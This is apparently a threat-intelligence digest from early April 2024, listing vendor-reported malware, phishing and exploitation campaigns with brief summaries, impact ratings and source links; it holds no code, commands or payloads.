- eSentire SOC analysts recently escalated to the Threat Response Unit a tax-themed campaign delivering XWorm as the final payload. Researchers are confident the initial infection vector is a phishing email.
Source:
https://www.esentire.com/blog/dont-take-the-bait-the-xworm-tax-scam
—
- Intel Source:
- Esentire
- Intel Name:
- A_series_of_tax_themed_phishing_emails_delivering_the_Remcos_RAT
- Date of Scan:
- 2024-04-12
- Impact:
- LOW
- Summary:
- Last month, eSentire researchers detected a series of tax-themed phishing emails delivering the Remcos RAT as the final payload through GuLoader. The phishing email contained the link to the password-protected ZIP archive hosted on Adobe Document Cloud.
Source:
https://www.esentire.com/blog/tax-season-alert-beware-of-guloader-and-remcos-rat
—
- Intel Source:
- Halcyon
- Intel Name:
- Halcyon_Threat_Insights_003
- Date of Scan:
- 2024-04-12
- Impact:
- LOW
- Summary:
- Halcyon researchers identified and blocked a wide range of threats that had been missed by other security layers in their clients’ environments and that are often precursors to the delivery of a ransomware payload.
Source:
https://www.halcyon.ai/blog/halcyon-threat-insights-003-march-2024
—
- Intel Source:
- Esentire
- Intel Name:
- SolarMarker_malware_campaigns
- Date of Scan:
- 2024-04-12
- Impact:
- LOW
- Summary:
- This month, eSentire’s researchers discovered that SolarMarker malware campaigns now utilize PyInstaller to hide malicious PowerShell scripts, marking a shift from previous methods such as Inno Setup and PS2EXE.
Source:
https://www.esentire.com/blog/solarmarkers-shift-to-pyinstaller-tactics
—
- Intel Source:
- Seqrite
- Intel Name:
- A_New_Banking_Trojan_Called_Coyote
- Date of Scan:
- 2024-04-12
- Impact:
- LOW
- Summary:
- Researchers at Seqrite have examined a new banking trojan known as Coyote, which abuses Squirrel Installer, a tool/library designed to install and manage updates of Windows applications. The malware appears more sophisticated than typical banking trojans and may pose a more serious threat in the coming days. It is aimed at the Brazilian market and targets various banking institutions in Brazil.
—
- Intel Source:
- Trellix
- Intel Name:
- Observed_spike_of_LockBit_related_activity_exploiting_vulnerabilities_in_ScreenConnect
- Date of Scan:
- 2024-04-12
- Impact:
- MEDIUM
- Summary:
- Trellix researchers recently observed a rise in LockBit-related activity exploiting vulnerabilities in ScreenConnect. Researchers are confident that the cybercriminal group behind LockBit ransomware has partially restored its infrastructure and is projecting the impression that the law enforcement actions did not affect its normal operation.
—
- Intel Source:
- Sucuri
- Intel Name:
- Embedding_a_credit_card_skimmer_in_a_fake_Facebook_Pixel_tracker_script
- Date of Scan:
- 2024-04-12
- Impact:
- LOW
- Summary:
- Sucuri recently discovered an interesting case in which attackers embedded a credit card skimmer in a well-concealed fake Facebook Pixel tracker script.
Source:
https://blog.sucuri.net/2024/04/credit-card-skimmer-hidden-in-fake-facebook-pixel-tracker.html
—
- Intel Source:
- Rapid7
- Intel Name:
- Continuation_of_execution_of_IDAT_Loader
- Date of Scan:
- 2024-04-11
- Impact:
- MEDIUM
- Summary:
- In part 2 of this series, Rapid7 continues to provide an analysis of how an MSIX installer led to the download and execution of the IDAT Loader. After they analyzed the recent tactics, techniques, and procedures observed (TTPs), Rapid7 concluded that the activity is associated with financially motivated threat groups.
—
- Intel Source:
- HP Wolf
- Intel Name:
- New_Raspberry_Robin_Malware_Campaign_Spreading_Through_WSF_Files
- Date of Scan:
- 2024-04-11
- Impact:
- HIGH
- Summary:
- HP Wolf Security researchers have discovered a new Raspberry Robin campaign wave that has propagated the malware through malicious Windows Script Files (WSFs) since March 2024. The scripts are highly obfuscated and use a range of anti-analysis techniques, enabling the malware to evade detection.
Source:
https://threatresearch.ext.hp.com/raspberry-robin-now-spreading-through-windows-script-files/
—
- Intel Source:
- Cyble
- Intel Name:
- Active_exploitation_continues_of_critical_D_Link_NAS_vulnerability
- Date of Scan:
- 2024-04-11
- Impact:
- MEDIUM
- Summary:
- Cyble Global Sensor Intelligence continues to observe active exploitation of critical D-Link NAS vulnerabilities. The vulnerabilities, CVE-2024-3272 and CVE-2024-3273, were originally discovered last month by a researcher using the alias “netsecfish” on GitHub; D-Link disclosed them on April 4, 2024. Cyble’s sensor network picked up exploitation attempts as early as April 9, which indicates the swift weaponization of publicly available exploits by threat actors (TAs) targeting vulnerable, internet-exposed D-Link NAS devices. Affected products are D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L with firmware up to 20240403.
Source:
https://cyble.com/blog/critical-d-link-nas-vulnerability-under-active-exploitation/
—
- Intel Source:
- ASEC
- Intel Name:
- Redis_Server_Used_to_Install_Metasploit_Meterpreter
- Date of Scan:
- 2024-04-11
- Impact:
- LOW
- Summary:
- Researchers from ASEC have found Redis services being abused to install the Metasploit Meterpreter backdoor. Redis (Remote Dictionary Server) is an open-source in-memory database and data structure store. The threat actors are assumed to have executed commands either by exploiting vulnerabilities or by abusing improper configuration.
—
- Intel Source:
- Krebs on Security
- Intel Name:
- The_exposure_of_Privnote_Phishing_Sites
- Date of Scan:
- 2024-04-11
- Impact:
- LOW
- Summary:
- A network of websites that mimic the self-destructing messaging service Privnote.com is being used by cybercriminals to steal cryptocurrency addresses, reports the BBC’s Yolande Knell.
Source:
https://krebsonsecurity.com/2024/04/fake-lawsuit-threat-exposes-privnote-phishing-sites/
—
- Intel Source:
- Trend Micro
- Intel Name:
- A_Continuous_Refinement_of_Waterbear_and_Deuterbear_by_Earth_Hundun
- Date of Scan:
- 2024-04-11
- Impact:
- MEDIUM
- Summary:
- Researchers at Trend Micro have observed a significant increase in cyberattacks directed at numerous organizations across industries, including government, research and technology. The attacks are attributed to the cyberespionage group Earth Hundun, also known as BlackTech, which is connected to the Waterbear malware family. BlackTech primarily targets government and technology institutions in the Asia-Pacific region.
Source:
https://www.trendmicro.com/en_us/research/24/d/earth-hundun-waterbear-deuterbear.html
—
- Intel Source:
- Cyble
- Intel Name:
- A_sophisticated_FatalRAT_campaign_targeting_cryptocurrency_users
- Date of Scan:
- 2024-04-11
- Impact:
- MEDIUM
- Summary:
- Cyble researchers discovered a new phishing campaign aimed at cryptocurrency users that deploys the known FatalRAT together with additional malware such as a clipper and a keylogger. The TAs target Chinese-speaking individuals or organizations, as evidenced by the use of Chinese-language installers. FatalRAT is a remote access trojan that gives attackers control over the victim’s computer and is equipped with extensive capabilities for stealing sensitive information.
Source:
https://cyble.com/blog/fatalrats-new-prey-cryptocurrency-users-in-the-crosshairs/
—
- Intel Source:
- Seqrite
- Intel Name:
- The_Rapid_Rise_of_Abyss_Locker_Ransomware
- Date of Scan:
- 2024-04-11
- Impact:
- MEDIUM
- Summary:
- Seqrite researchers have observed that the recently launched ransomware operation Abyss Locker has quickly grown into a serious threat to a variety of targets, including public sector organizations, businesses and industrial control systems (ICS). It poses a serious risk to both Linux and Windows systems.
Source:
https://www.seqrite.com/blog/unveiling-abyss-locker-the-rapid-rise-of-a-menacing-ransomware-threat/
—
- Intel Source:
- CERT-AGID
- Intel Name:
- Credentials_Forwarded_to_Telegram_Bot_in_PEC_Phishing_Campaign
- Date of Scan:
- 2024-04-11
- Impact:
- LOW
- Summary:
- Researchers from CERT-AGID have discovered a phishing campaign that aims to fraudulently obtain credentials for Certified Electronic Mail (PEC) mailboxes in order to carry out fraudulent operations. An email containing false information is sent to PEC account holders: it warns of an alleged account deactivation request that will be carried out within 24 hours and invites the recipient to click a link in the message body if they believe this is an error.
Source:
https://cert-agid.gov.it/news/campagna-di-phishing-pec-credenziali-inoltrate-ad-un-bot-telegram/
—
- Intel Source:
- Sophos
- Intel Name:
- Exposing_Smoke_and_Screen_Mirrors_Backdoor
- Date of Scan:
- 2024-04-10
- Impact:
- LOW
- Summary:
- Researchers at Sophos have investigated the discovery of a backdoor hidden in an executable file that posed as legitimate by carrying a genuine Microsoft Hardware Publisher Certificate signature. The analysis reveals the backdoor’s association with LaiXi Android Screen Mirroring, a software package that appears benign at first glance, and describes the strategies threat actors use to avoid discovery.
Source:
https://news.sophos.com/en-us/2024/04/09/smoke-and-screen-mirrors-a-strange-signed-backdoor/
—
- Intel Source:
- Strikeready
- Intel Name:
- Activity_of_Sidewinder_Threat_Group
- Date of Scan:
- 2024-04-10
- Impact:
- MEDIUM
- Summary:
- This in-depth examination explores the methods cybersecurity researchers used to locate and identify infrastructure connected to the Sidewinder threat group. It describes a broad approach in which several search queries are applied to different data sources with the goal of finding signs and artifacts associated with the adversary’s activities. The methodology consists of searching for particular strings, encoded payloads, and network fingerprints, and using intelligence feeds to find new domains, IPs, and possible infrastructure that the group uses for command and control.
Source:
https://blog.strikeready.com/blog/rattling-the-cage-of-a-sidewinder
—
- Intel Source:
- Checkmarx
- Intel Name:
- Hackers_Using_New_Technique_to_Trick_Developers_in_Open_Source_Supply_Chains
- Date of Scan:
- 2024-04-10
- Impact:
- MEDIUM
- Summary:
- Researchers at Checkmarx have examined the concerning practice of attackers abusing GitHub’s search feature to spread malware. By quietly creating repositories with well-known names and topics, attackers trick unsuspecting users into downloading and running harmful programs.
—
- Intel Source:
- Proofpoint
- Intel Name:
- TA547_Targets_German_Organizations_with_Rhadamanthys_Malware
- Date of Scan:
- 2024-04-10
- Impact:
- LOW
- Summary:
- Proofpoint researchers have discovered that a group called TA547 is sending emails carrying Rhadamanthys malware to German organizations. This malware steals information and is used by many cybercriminals. The group also appears to be using a PowerShell script possibly created by large language models such as ChatGPT or Gemini.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- A_potential_threat_detected_in_the_customer_environment
- Date of Scan:
- 2024-04-10
- Impact:
- LOW
- Summary:
- A senior SecOps analyst recently discussed a potential threat detected in a customer environment. It started with an investigation of a group called Wazawaka; after studying Wazawaka’s activities, the threat-hunting team created numerous SentinelOne queries to detect similar activity. Although the team concluded that this activity was not the work of Wazawaka, they decided to continue the investigation.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Malicious_Campaign_Targeting_System_Administrator_With_Nitrogen_Malware
- Date of Scan:
- 2024-04-10
- Impact:
- LOW
- Summary:
- Malwarebytes Labs researchers have observed an ongoing campaign targeting system administrators through fake ads for well-known system tools. These ads appear as sponsored links in Google searches, mainly in North America. Victims are lured into downloading what appear to be PuTTY or FileZilla installers but are actually Nitrogen malware. This malware allows attackers to breach networks, steal data, and introduce ransomware such as BlackCat/ALPHV.
—
- Intel Source:
- Sysdig
- Intel Name:
- An_Established_Romanian_APT_Group_RUBYCARP
- Date of Scan:
- 2024-04-10
- Impact:
- LOW
- Summary:
- Sysdig researchers have uncovered a persistent botnet maintained by a Romanian threat actor group they refer to as RUBYCARP. Based on the evidence, this threat actor appears to have been active for at least ten years. Its main mode of operation relies on a botnet built up through a number of public exploits and brute-force attacks. The group uses both public and private IRC networks for communication, develops its own tooling and target databases, and employs the botnet to mine cryptocurrency and send phishing scams.
Source:
https://sysdig.com/blog/rubycarp-romanian-botnet-group/
—
- Intel Source:
- Perception-Point
- Intel Name:
- Phishing_campaign_targets_LinkedIn_users
- Date of Scan:
- 2024-04-09
- Impact:
- LOW
- Summary:
- This blog highlights a new LinkedIn threat, one that combines breached accounts and an evasive 2-step phishing attack.
—
- Intel Source:
- PTsecurity
- Intel Name:
- LazyStealer_analysis
- Date of Scan:
- 2024-04-09
- Impact:
- MEDIUM
- Summary:
- In the first quarter of 2024, Positive Technologies’ Expert Security Center (PT ESC) uncovered a series of attacks targeting government structures in Russia, Belarus, Kazakhstan, Uzbekistan, Kyrgyzstan, Tajikistan, and Armenia. The primary goal was to steal account credentials for various services used on government employees’ computers. The group, dubbed Lazy Koala because of its simple techniques and the username of the operator managing the Telegram bots that receive the stolen data, used a malware called LazyStealer, which was straightforward but effective. All victims were directly notified of the compromise.
—
- Intel Source:
- Fortinet
- Intel Name:
- Attackers_Delivering_Multi_Stage_Malware_via_Invoice_Phishing
- Date of Scan:
- 2024-04-09
- Impact:
- LOW
- Summary:
- Fortinet researchers have discovered an intricate multi-stage attack that leverages invoice-themed phishing decoys to deliver a wide range of malware such as Venom RAT, Remcos RAT, XWorm, NanoCore RAT, and a stealer that targets crypto wallets.
Source:
https://www.fortinet.com/blog/threat-research/scrubcrypt-deploys-venomrat-with-arsenal-of-plugins
—
- Intel Source:
- Palo Alto
- Intel Name:
- The_increased_activity_of_the_malware_initiated_vulnerability
- Date of Scan:
- 2024-04-09
- Impact:
- MEDIUM
- Summary:
- Palo Alto Networks’ Unit 42 detected an increased number of threat actors turning to malware-initiated scanning attacks. The Unit 42 blog details how attackers use infected hosts to scan their targets instead of the more traditional approach of direct scans. By launching scanning attacks from compromised hosts, attackers can cover their traces, bypass geofencing, expand botnets, and leverage the resources of the compromised devices.
Source:
https://unit42.paloaltonetworks.com/malware-initiated-scanning-attacks/
—
- Intel Source:
- Greynoise
- Intel Name:
- A_wild_exploitation_of_D_Link_NAS_RCE
- Date of Scan:
- 2024-04-09
- Impact:
- LOW
- Summary:
- A remote code execution vulnerability in D-Link NAS devices, tracked as CVE-2024-3273, is being actively exploited. The vulnerability is believed to affect as many as 92,000 devices.
Source:
https://www.greynoise.io/blog/cve-2024-3273-d-link-nas-rce-exploited-in-the-wild
—
- Intel Source:
- Harfanglab
- Intel Name:
- Raspberry_Robin_anti_emulation_trick
- Date of Scan:
- 2024-04-09
- Impact:
- LOW
- Summary:
- An analysis of the constantly evolving evasion capabilities employed by the Raspberry Robin malware, which has emerged as a prominent threat. The report delves into the recent variant’s unique anti-emulation techniques that leverage undocumented functions from the Windows Defender emulator’s virtual DLLs, potentially marking the first instance of such exploitation. It highlights the malware’s ability to evade detection and facilitate access for other threat actors, emphasizing the need for proactive countermeasures.
Source:
https://harfanglab.io/en/insidethelab/raspberry-robin-and-its-new-anti-emulation-trick/
—
- Intel Source:
- CERT-AGID
- Intel Name:
- A_Constant_Was_Found_in_AgentTesla_Italian_Campaigns
- Date of Scan:
- 2024-04-09
- Impact:
- MEDIUM
- Summary:
- CERT-AGID researchers have noticed unusually high activity distinguished by the use of PDF files. The distribution of AgentTesla in Italy is the focus of yet another large operation that has been underway for roughly the past nine months and appears to follow a regular monthly cadence.
—
- Intel Source:
- Palo Alto
- Intel Name:
- Boggy_Serpens_Use_of_AutodialDLL
- Date of Scan:
- 2024-04-09
- Impact:
- LOW
- Summary:
- Researchers at Palo Alto have found that Boggy Serpens is abusing the AutodialDLL entry in the Windows Registry. Palo Alto tracks this Iranian state-sponsored threat actor, also known as MuddyWater or TA450, under the name Boggy Serpens.
—
- Intel Source:
- 0DAY IN {REA_TEAM}
- Intel Name:
- WarZone_RAT_Distributing_via_DBatLoader_Using_Phishing_Emails
- Date of Scan:
- 2024-04-09
- Impact:
- LOW
- Summary:
- Researchers from 0DAY IN have discovered a phishing email that uses DBatLoader to spread the WarZone RAT. The user received an email from the attacker with a .html file attached. Viewed in a hex editor, the PO-2200934-KINQTE.html file appears to contain scripts and a sizable blob of base64-encoded data.
—
- Intel Source:
- ASEC
- Intel Name:
- Malware_that_changes_the_Notepad_Plus_Plus_plugin
- Date of Scan:
- 2024-04-08
- Impact:
- LOW
- Summary:
- ASEC’s analysis confirmed that “mimeTools.dll,” a basic plugin for Notepad++, had been modified and distributed. The malicious mimeTools.dll was included in the installation file of a specific version of the Notepad++ package and was disguised as a normal package file. mimeTools is a module that performs encoding functions such as Base64.
—
- Intel Source:
- Any.Run
- Intel Name:
- Abusing_WebDAV_to_deliver_malicious_payload
- Date of Scan:
- 2024-04-08
- Impact:
- LOW
- Summary:
- Any.Run analysts simulated an attack using the WebDAV file transfer protocol and explained how attackers often place malicious payloads on remote servers, which are then downloaded and executed on the user’s PC via scripts or other methods.
Source:
https://any.run/cybersecurity-blog/client-side-exploitation/
—
- Intel Source:
- Antiy
- Intel Name:
- Recent_activity_of_Youshe_malware_attack
- Date of Scan:
- 2024-04-08
- Impact:
- LOW
- Summary:
- Recently, Antiy CERT has detected attacks carried out by the “Youshe” cybercrime group targeting companies and personnel related to finance and taxation. There are three main types of initial malicious files dropped by the attackers: executable programs, CHM files, and the commercial remote control software “Third Eye”. Most of the forged file names relate to finance and taxation, information, letters, and similar themes.
Source:
https://www.antiy.cn/research/notice&report/research_report/SwimSnake_Analysis_202404.html
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Enhancing_Endpoint_Security_Through_Threat_Hunting
- Date of Scan:
- 2024-04-08
- Impact:
- LOW
- Summary:
- Researchers from ISC.SANS highlight the importance of integrating threat hunting into Security Operations Teams to enhance endpoint security. Even when relying on Endpoint Detection and Response (EDR) tools, continuous fine-tuning is essential for maximum effectiveness. A case study shows how threat hunters detected an attempt to install a browser hijacker via a deceptive .msi file that had evaded detection by the EDR.
—
- Intel Source:
- Trustwave
- Intel Name:
- Suspended_Domains_Show_Malevolent_Payload_for_Region_of_Latin_America
- Date of Scan:
- 2024-04-08
- Impact:
- LOW
- Summary:
- Trustwave researchers have discovered a phishing campaign aimed at the Latin American region. The phishing email carried a ZIP attachment that, upon extraction, revealed an HTML page which, when opened, downloaded a malicious file disguised as an invoice.
—
- Intel Source:
- SCmagazine
- Intel Name:
- NordVPN_posted_as_Bing_and_spreads_SecTopRAT_malware
- Date of Scan:
- 2024-04-08
- Impact:
- LOW
- Summary:
- Threat actors built a fake website, and a legitimate-looking link to install NordVPN was found to lead instead to an installer for the remote access trojan SecTopRAT. Malwarebytes reported the malware campaign to both Microsoft, which owns Bing, and Dropbox.
Source:
https://www.scmagazine.com/news/bing-ad-posing-as-nordvpn-aims-to-spread-sectoprat-malware
—
- Intel Source:
- ASEC
- Intel Name:
- Infostealers_Spread_via_Compromised_YouTube_Channels
- Date of Scan:
- 2024-04-08
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered a campaign in which well-known YouTube channels were compromised and used to distribute Vidar and LummaC2 malware. These tools, categorized as infostealers, are capable of harvesting sensitive user data from infected devices and facilitating the installation of additional malware.
—
- Intel Source:
- CYFIRMA Research
- Intel Name:
- A_New_Campaign_Found_That_Is_Aimed_at_People_in_South_Asia
- Date of Scan:
- 2024-04-08
- Impact:
- LOW
- Summary:
- Researchers from CYFIRMA have discovered a sophisticated cyberthreat aimed at people in South Asia. Their research team found a malware campaign that used a misleading self-extracting (SFX) executable. These files are one component of a complex attack used to compromise systems and carry out malicious activities, and they are embedded in the malicious binaries and a fake PDF. Further investigation suggests that Russian cybercriminals may have collaborated, raising questions about the C2 infrastructure targeting people in South Asia.
—
- Intel Source:
- SOCRadar
- Intel Name:
- Mallox_ransomware_profile
- Date of Scan:
- 2024-04-08
- Impact:
- LOW
- Summary:
- Mallox is both a ransomware strain and the group of the same name that operates it; it encrypts victims’ data and then demands a ransom, typically in cryptocurrency. It is also called “TargetCompany,” “Tohnichi,” or “Fargo” ransomware and has been active since 2021.
Source:
https://socradar.io/dark-web-profile-mallox-ransomware/
—
- Intel Source:
- Fortinet
- Intel Name:
- Byakugan_malware_phishing_attack
- Date of Scan:
- 2024-04-06
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs collected a sample distributing Byakugan, a new multi-functional malware it first discovered in January 2024. It is distributed through a PDF file and has features such as screen monitoring, screen capture, and browser information theft, along with anti-analysis and persistence capabilities to avoid detection. The researchers also shared information on the infection vector, the web page involved, the malware’s features, and protections against it, and included IOCs so organizations can check whether they have been impacted.
Source:
https://www.fortinet.com/blog/threat-research/byakugan-malware-behind-a-phishing-attack
—
- Intel Source:
- Deepinstinct
- Intel Name:
- The_latest_C2_framework_attack_in_MuddyWater_activity
- Date of Scan:
- 2024-04-06
- Impact:
- MEDIUM
- Summary:
- Deep Instinct analysts examined the DarkBeatC2 attack framework, used by Iranian threat actors to target Israeli networks, and provided details on its capabilities and techniques. The report also emphasizes the importance of sharing information and addressing vulnerabilities to prevent attacks, and highlights the effectiveness of Deep Instinct’s prevention-first capabilities.
Source:
https://www.deepinstinct.com/blog/darkbeatc2-the-latest-muddywater-attack-framework
—
- Intel Source:
- PaloAlto
- Intel Name:
- The_Most_Recent_Round_of_Action_For_KoiLoader_or_KoiStealer
- Date of Scan:
- 2024-04-05
- Impact:
- LOW
- Summary:
- Palo Alto researchers reproduced an infection in a lab environment from the most recent round of KoiLoader/KoiStealer activity. The first bank-themed lures appeared on 2024-04-02, earlier that week.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Using_Binary_Ninja_to_Chop_Up_DoNex
- Date of Scan:
- 2024-04-05
- Impact:
- LOW
- Summary:
- Researchers at ISC.SANS have noted that, given the popularity and effectiveness of LockBit, it is not surprising that newer ransomware groups have incorporated a significant portion of the LockBit code base into their own following the LockBit source code release in mid-June 2022. Darkrace, a ransomware group that emerged around the middle of June 2023, is one of LockBit’s more obvious spinoffs: its samples closely resembled binaries from the leaked LockBit builder, and it used a similar distribution process. Darkrace then vanished from view when the LockBit clone’s operators chose to take down its leak site.
Source:
https://isc.sans.edu/diary/Slicing+up+DoNex+with+Binary+Ninja/30812/
—
- Intel Source:
- Bitdefender
- Intel Name:
- Next_gen_info_stealers
- Date of Scan:
- 2024-04-05
- Impact:
- LOW
- Summary:
- Bitdefender shared information in their blog about artificial intelligence themes in social media malvertising campaigns, where cybercriminals exploit the appeal of AI-powered software to steal sensitive information from unsuspecting users. The post also covers the malware-as-a-service (MaaS) business model and details a particular malicious extension, Rilide Stealer V4.
—
- Intel Source:
- Sonicwall
- Intel Name:
- Updated_StrelaStealer_infostealer_targets_Europe
- Date of Scan:
- 2024-04-05
- Impact:
- LOW
- Summary:
- Sonicwall researchers shared the analysis of the updated version of a malware called StrelaStealer, which is targeting European countries. The malware is delivered via JavaScript in email attachments and is designed to steal email account credentials from Outlook and Thunderbird.
Source:
https://blog.sonicwall.com/en-us/2024/04/updated-strelastealer-targeting-european-countries/
—
- Intel Source:
- Talos
- Intel Name:
- The_need_for_companies_to_upgrade_their_security_measures
- Date of Scan:
- 2024-04-05
- Impact:
- LOW
- Summary:
- The article provides a comprehensive overview of recent cybersecurity news and events. The “Top security headlines of the week” section highlights the joint charges and sanctions against a Chinese state-sponsored actor, a potential supply chain attack on Linux machines, and a backlog of vulnerabilities in the National Vulnerability Database. It also includes information about upcoming events and a list of prevalent malware files. The author discusses the use of cybersecurity as an excuse for return-to-office policies and argues that security measures should remain consistent regardless of where employees work from. The article emphasizes the need for companies to upgrade their security measures to counter adversaries’ use of remote system management tools.
Source:
https://blog.talosintelligence.com/threat-source-newsletter-april-4-2024/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- NordVPN_Masquerade_Leads_to_Fake_Site
- Date of Scan:
- 2024-04-05
- Impact:
- LOW
- Summary:
- Malwarebytes Labs researchers have discovered a malvertising campaign posing as the widely-used VPN service NordVPN. A malicious advertiser hijacks traffic from Bing searches, redirecting users to a fake site closely resembling the authentic NordVPN platform.
Source:
https://www.malwarebytes.com/blog/threat-intelligence/2024/04/bing-ad-for-nordvpn-leads-to-sectoprat
—
- Intel Source:
- Cisco Talos
- Intel Name:
- A_New_Threat_Group_Named_CoralRaider
- Date of Scan:
- 2024-04-05
- Impact:
- LOW
- Summary:
- Researchers from Cisco Talos have identified a new threat actor known as “CoralRaider,” which they assess to be financially motivated and of Vietnamese origin. CoralRaider has been targeting victims in several Asian and Southeast Asian nations since at least 2023. The group’s main targets are credentials, banking information, and social media accounts, including business and advertising accounts.
Source:
https://blog.talosintelligence.com/coralraider-targets-socialmedia-accounts/
—
- Intel Source:
- Mandiant
- Intel Name:
- Chinese_Hacker_Groups_Exploit_Ivanti_Security_Flaws
- Date of Scan:
- 2024-04-05
- Impact:
- LOW
- Summary:
- Mandiant researchers have identified several Chinese hacker groups exploiting vulnerabilities in Ivanti systems, particularly CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893. In addition, they have observed financially motivated actors exploiting CVE-2023-46805 and CVE-2024-21887, potentially for cryptocurrency mining.
Source:
https://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement
—
- Intel Source:
- SANSEC
- Intel Name:
- Vulnerability_in_Magento_Used_to_Install_Persistent_Backdoor
- Date of Scan:
- 2024-04-05
- Impact:
- LOW
- Summary:
- Attackers are employing a novel persistence technique on Magento servers. Researchers from Sansec have found that malware was automatically injected into the database using a carefully crafted layout template.
—
- Intel Source:
- ReversingLabs
- Intel Name:
- VS_Code_Extensions_Caught_Harvesting_Sensitive_Data
- Date of Scan:
- 2024-04-04
- Impact:
- LOW
- Summary:
- Researchers at ReversingLabs uncovered a recent malicious campaign featuring a range of malicious packages, from basic infostealers and downloaders to more sophisticated reverse shells and complex payloads. Among these, two Visual Studio Code extensions were discovered, characterized by their simple design and heavy reliance on sample code provided by Microsoft for VS Code beginners.
—
- Intel Source:
- Resecurity
- Intel Name:
- JsOutProx_Malware_Targets_Financial_Institutions
- Date of Scan:
- 2024-04-04
- Impact:
- LOW
- Summary:
- Resecurity researchers discovered an updated iteration of JSOutProx, showcasing the malicious actors’ persistent and sophisticated tactics through the exploitation of platforms such as GitHub and GitLab. Initially identified in 2019, JSOutProx continues to pose a substantial and evolving threat, especially targeting customers of financial institutions.
—
- Intel Source:
- Proofpoint
- Intel Name:
- Emergence_of_Latrodectus_Malware_in_Email_Threat_Campaigns
- Date of Scan:
- 2024-04-04
- Impact:
- MEDIUM
- Summary:
- Proofpoint researchers have noticed a recent addition to email threat campaigns called Latrodectus. It first surfaced in late November 2023. Although its presence declined in December 2023 and January 2024, it made a resurgence in February and March 2024. Latrodectus functions as a downloader and comes equipped with several features to evade sandbox detection. While it shares similarities with IcedID, it’s a distinct malware believed to originate from the developers of IcedID.
Source:
https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice
—
- Intel Source:
- Norfolkinfosec
- Intel Name:
- North_Korea_threat_group_Python_Payloads
- Date of Scan:
- 2024-04-04
- Impact:
- LOW
- Summary:
- Norfolkinfosec researchers provided technical details of the second- and third-stage malware used by a North Korean threat actor group, including code analysis and the names and hashes of the files involved. For example, main.py is an obfuscated Python script that downloads and executes the next two stages, brow.py steals browser data, and pay.py acts as a backdoor with keylogging capabilities.
Source:
https://norfolkinfosec.com/north-koreas-post-infection-python-payloads/
—
- Intel Source:
- Cyble
- Intel Name:
- Unveiling_the_Advanced_Tactics_of_the_Counterfeit_E_Commerce_Scheme
- Date of Scan:
- 2024-04-04
- Impact:
- LOW
- Summary:
- Cyble researchers have identified an escalating fake e-shop campaign targeting 18 Malaysian banks with upgraded malicious applications. This campaign, which initially targeted Malaysian banks, has expanded its scope to include banks in Vietnam and Myanmar. The latest iteration of the malware introduces advanced functionalities, including screen-sharing capabilities, the use of accessibility services, and complex communication with command and control servers.
Source:
https://cyble.com/blog/elevating-the-stakes-the-enhanced-arsenal-of-the-fake-e-shop-campaign/
—
- Intel Source:
- Trend Micro
- Intel Name:
- Effect_on_LockBit_Post_Significant_Disruption
- Date of Scan:
- 2024-04-04
- Impact:
- LOW
- Summary:
- Trend Micro’s latest publication offers significant insights into the aftermath of Operation Cronos, shedding light on LockBit’s post-disruption strategies. Their research delves into telemetry data showcasing LockBit’s transition to a .NET core, highlighting the necessity for innovative security detection methods. Furthermore, the exposure of LockBit’s backend details has not only unveiled affiliate identities and victim information but also potentially disrupted trust and collaboration within the cybercriminal ecosystem.
Source:
https://www.trendmicro.com/en_us/research/24/d/operation-cronos-aftermath.html
—
- Intel Source:
- ASEC
- Intel Name:
- Rhadamanthys_Malware_Concealed_within_Groupware_Installer
- Date of Scan:
- 2024-04-04
- Impact:
- LOW
- Summary:
- ASEC researchers uncovered that Rhadamanthys malware was being distributed disguised as a groupware installer. The attackers created a fake website resembling the original and promoted it through online ads. The malware employs a stealthy technique called “indirect syscall” to evade detection by security tools, making it challenging to spot.
—
- Intel Source:
- Crowdstrike
- Intel Name:
- XZ_Upstream_Supply_Chain_Attack
- Date of Scan:
- 2024-04-03
- Impact:
- HIGH
- Summary:
- The article discusses the CVE-2024-3094 vulnerability found in the XZ Utils library and how CrowdStrike is actively protecting its customers from potential exploitation. It provides an overview of the vulnerability, its impact, and how it can be detected and prevented using CrowdStrike’s Falcon platform. The article also offers guidance for organizations to defend against the exploitation of this vulnerability, along with relevant hashes and additional resources for further information.
Source:
https://www.crowdstrike.com/blog/cve-2024-3094-xz-upstream-supply-chain-attack/
—
- Intel Source:
- McAfee
- Intel Name:
- A_significant_change_in_the_campaigns_that_distribute_Pikabot
- Date of Scan:
- 2024-04-03
- Impact:
- LOW
- Summary:
- Recently, McAfee Labs observed a significant change in the campaigns that distribute Pikabot. Pikabot is distributed through multiple file types for various reasons, depending on the objectives and nature of the attack. In this campaign, Pikabot is distributed through a zip file that includes an HTML file. This HTML file then proceeds to download a text file, ultimately resulting in the deployment of the payload.
—
- Intel Source:
- Domain tools
- Intel Name:
- The_resurgence_of_the_Manipulaters_cybercrime_group
- Date of Scan:
- 2024-04-03
- Impact:
- LOW
- Summary:
- The article discusses the resurgence of the “Manipulaters” team, a cybercrime group known for its spamming and phishing activities. The team uses techniques such as DP access, “bulletproof” hosting, and forged identity documents to carry out its operations, and rebrands and combines existing tools into its own software applications, with a focus on selling spam services. The article provides specific domains, IP addresses, and email addresses associated with the Manipulaters and their spamming tool HeartSender, discusses the use of JavaScript and XML in HeartSender, and lists several email addresses and usernames linked to the group, including the registration of nearly 500 domains associated with the email address “[email protected]” and the use of various aliases. It urges businesses and consumers to remain vigilant against threat actor groups like the Manipulaters, provides resources for further information, and includes a list of active shops with their associated email addresses and usernames. The article also covers the history and current activities of the Manipulaters, their lack of technical sophistication, their expansion into selling web domains, their potential involvement in impersonating the USPS, and their use of session cookie grabbers. It highlights the Manipulaters’ operational security failures and the resulting risks to their own customers, including the compromise of several PCs associated with the group and the exposure of customer data and operational details. The article concludes with information on two clusters of activity associated with the Manipulaters, including usernames, email addresses, and associated domains.
—
- Intel Source:
- Mcafee
- Intel Name:
- Diverse_Campaign_Tactics_and_Payload_Analysis
- Date of Scan:
- 2024-04-03
- Impact:
- LOW
- Summary:
